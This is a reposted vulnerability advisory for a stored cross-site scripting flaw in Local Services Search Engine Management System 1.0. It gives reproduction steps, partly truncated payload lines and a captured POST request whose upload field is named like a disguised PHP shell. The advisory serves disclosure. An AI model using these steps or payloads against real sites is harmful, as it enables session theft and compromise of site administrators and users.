Local Services Search Engine Management System 1.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition

Exploit/Advisories no-image-featured-image.png

Published on March 4th, 2021 📆 | 8227 Views ⚑


Local Services Search Engine Management System 1.0 Cross Site Scripting ≈ Packet Storm

# Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 – ‘name’ Persistent Cross-Site Scripting (XSS)
# Date: 2021-03-03
# Exploit Author: Tushar Vaidya
# Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867
# Version: v1.0
# Tested on: Ubuntu

*Steps to Reproduce:*
1) Login with Admin Credentials and click on the *Person List* button.
2) Click on the *Add Person* button.
3) Now add the ‘Ba1man’ in the input field of *Name* and ‘Ba2man’ in the input field of *Address *then intercept it with Burp Suite.
4) Now add the following payload input field of *Name & Address*.

Payload 1: ba1man”>
Payload 2: ba2man”>

4) Click On Add
5) Now go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
6) XSS payload is triggered.
7) Secondly, go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
8) Again XSS payload is triggered

1) Vulnerable Form Request:

POST /LSSMES/lssems/admin/add-person.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 1110
Origin: http:// localhost
Connection: close
Referer: http:// localhost /LSSMES/lssems/admin/add-person.php
Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc
Upgrade-Insecure-Requests: 1
Content-Disposition: form-data; name=”category”
Content-Disposition: form-data; name=”name”


Content-Disposition: form-data; name=”propic”; filename=”mime_shell.php.gif”
Content-Type: image/gif
Content-Disposition: form-data; name=”mobilenumber”
Content-Disposition: form-data; name=”address”


Content-Disposition: form-data; name=”city”

Content-Disposition: form-data; name=”submit”

2.1) Response:
Go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
Note: XSS from name parameter

2.2) Response:
Go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
Note: XSS from address parameter

Source link

Tagged with:

Leave a Reply